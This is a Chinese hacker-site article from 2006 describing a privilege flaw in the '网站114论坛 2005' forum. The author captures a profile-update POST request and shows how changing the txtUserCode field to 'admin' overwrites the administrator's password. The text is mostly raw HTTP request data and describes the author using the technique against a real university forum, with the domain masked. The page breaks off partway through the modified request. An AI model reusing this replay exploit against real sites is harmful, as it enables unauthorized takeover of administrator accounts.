|
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
|
|
||||||||
|
||||||||
|
|||||
| 114论坛2005正式版漏洞 | |||||
作者:未知 文章来源:CnXHacker.Net 点击数: 更新时间:2006-4-10 ![]() |
|||||
|
关键字: "版权所有 设计制作:网站114" 漏洞描述: 网站114论坛 2005版正式 /edituserdb.asp 对提交数据和cooikes缺乏验证 导致任意用户可以修改管理员密码 默认后台admin/index.asp 今天在旁注一个机房的机器时用了一下。 http://www.***.net.cn/xzl/BBS/index.asp **医科大学网站上的一个论坛。 注册了一个用户33221. 然后跳转到 /edituserdb.asp,单击“修改注册”开始抓包! 用记事本保存抓包内容如下: ----------------------------------------------------------------------------------------------------------- POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.***.net.cn/xzl/BBS//edituserdb.asp Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon) Host: www.***.net.cn Content-Length: 2304 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtUserCode" 33221 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtPassword" 33221 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtConfirmPassword" 33221 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtQuestion" 33221 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtAnswer" 33221 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtUserName" 33221 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="selSex" 先生 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtNick" 11 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtProvince" 111 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtAddress" -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtPostCode" -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtTel" -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtMobile" -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtFax" -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtEmail" -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtUrl" -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtfile"; filename="" Content-Type: application/octet-stream -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtOicq" -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtDocument" -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="submit" 修改注册信息 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtId" -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtTempId" -----------------------------7d61e41d605f6-- ------------------------------------------------------------------------------------------------------------ 其中:“ -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtUserCode" 33221 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtPassword" 33221 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtConfirmPassword" 33221 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtQuestion" 33221 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtAnswer" 33221 -----------------------------7d61e41d605f6 ” 修改第一个"33221"为“admin”保存11.txt文本为: POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* Referer: http://www.***.net.cn/xzl/BBS//edituserdb.asp Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon) Host: www.***.net.cn Content-Length: 2304 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtUserCode" admin -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtPassword" 33221 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtConfirmPassword" 33221 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtQuestion" 33221 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtAnswer" 33221 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtUserName" 33221 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="selSex" 先生 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtNick" 11 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtProvince" 111 -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtAddress" -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtPostCode" -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtTel" -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtMobile" -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtFax" -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtEmail" -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtUrl" -----------------------------7d61e41d605f6 Content-Disposition: form-data; name="txtfile"; f |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 瑞星公司09月14日发布 每日计 瑞星公司09月11日发布 每日计 11个不可不知的安全保护常识 11岁少年不满酬劳低搞坏所建 瑞星公司08月14日发布 每日计 瑞星公司08月11日发布 每日计 谨防微软漏洞MS06-014传播“ 瑞星公司07月14日发布 每日计 微软发布补丁修11项漏洞 Vis 上半年新增病毒11万种 电脑染 |
网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
| » CnXHacker.CoM | © CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |